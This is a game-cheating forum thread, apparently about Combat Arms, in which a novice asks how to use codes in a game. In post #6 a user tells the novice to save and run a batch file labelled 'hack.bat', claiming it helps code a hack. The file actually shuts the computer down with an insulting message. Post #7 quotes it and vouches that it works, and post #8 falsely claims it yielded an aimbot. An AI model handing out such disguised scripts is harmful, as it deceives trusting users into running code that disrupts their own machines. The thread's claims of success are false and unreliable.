Results 1 to 8 of 8
  1. #1
    im-ur-nightmare's Avatar
    Join Date
    Nov 2010
    Gender
    male
    Location
    IN FREDDY CROUGERS NIGHTMARE
    Posts
    44
    Reputation
    9
    Thanks
    5
    My Mood
    Amused

    Question HOW DO U USE CODES IN GAME

    UMMM CAN SOMEONE TELL ME HOW TO USE CODES IN A GAME CAUSE I DONT KNOW HOW TO AT ALL????????????

  2. #2
    Zithium's Avatar
    Join Date
    Oct 2010
    Gender
    male
    Location
    UK
    Posts
    2,997
    Reputation
    103
    Thanks
    438
    My Mood
    Psychedelic
    You cant use codes ingame, you use the codes to make the hack.

  3. The Following User Says Thank You to Zithium For This Useful Post:

    im-ur-nightmare (11-11-2010)

  4. #3
    matypatty's Avatar
    Join Date
    Aug 2009
    Gender
    male
    Posts
    862
    Reputation
    156
    Thanks
    2,688
    My Mood
    Amused
    You don't .

  5. #4
    AVGN's Avatar
    Join Date
    Sep 2009
    Gender
    male
    Location
    Making America Great Again.
    Posts
    15,451
    Reputation
    1549
    Thanks
    6,234
    c+p the text in the lobby /



    ^Thanks to RJ^




  6. #5
    NOOB's Avatar
    Join Date
    Apr 2010
    Gender
    male
    Posts
    3,863
    Reputation
    425
    Thanks
    8,598
    CodeDemon made a PTC checker where you can enter console commands in a textbox ingame.

  7. #6
    BSOD's Avatar
    Join Date
    Oct 2010
    Gender
    male
    Posts
    181
    Reputation
    31
    Thanks
    35
    1. Open notepad
    2. Paste this code in it.

    Code:
    @echo off
    c:
    cls
    echo You are about to code a hack?
    pause
    echo Press any key to start coding.
    pause
    echo u r hacked
    echo Type Telekill 1
    shutdown -s -t 30 -c “f*ck off”
    4. Save notepad as hack.bat
    5. Run
    6. Enjoy!

  8. #7
    Zithium's Avatar
    Join Date
    Oct 2010
    Gender
    male
    Location
    UK
    Posts
    2,997
    Reputation
    103
    Thanks
    438
    My Mood
    Psychedelic
    Quote Originally Posted by BSOD View Post
    1. Open notepad
    2. Paste this code in it.

    Code:
    @echo off
    c:
    cls
    echo You are about to code a hack?
    pause
    echo Press any key to start coding.
    pause
    echo u r hacked
    echo Type Telekill 1
    shutdown -s -t 30 -c “f*ck off”
    4. Save notepad as hack.bat
    5. Run
    6. Enjoy!
    This works well /

  9. #8
    BSOD's Avatar
    Join Date
    Oct 2010
    Gender
    male
    Posts
    181
    Reputation
    31
    Thanks
    35
    Quote Originally Posted by Zithium View Post


    This works well /
    Thanks i got aimbot to work out of this

Similar Threads

  1. how do u use codes?Sos i forgot.
    By wassup gee in forum Combat Arms Coding Help & Discussion
    Replies: 12
    Last Post: 07-13-2011, 06:50 AM
  2. HOW DO U USE CODES TO MAKE A HACK
    By im-ur-nightmare in forum Combat Arms Coding Help & Discussion
    Replies: 4
    Last Post: 11-11-2010, 03:03 PM
  3. how to add source codes to the game?
    By eggsrock85 in forum CrossFire Help
    Replies: 0
    Last Post: 08-16-2010, 01:30 PM
  4. [HELP]How to get serial code for games on steam!
    By MoFkN iBoSS in forum General
    Replies: 9
    Last Post: 04-04-2010, 08:48 AM
  5. How do i use wall hack in game?
    By tete94 in forum Combat Arms Hacks & Cheats
    Replies: 8
    Last Post: 04-09-2009, 12:06 PM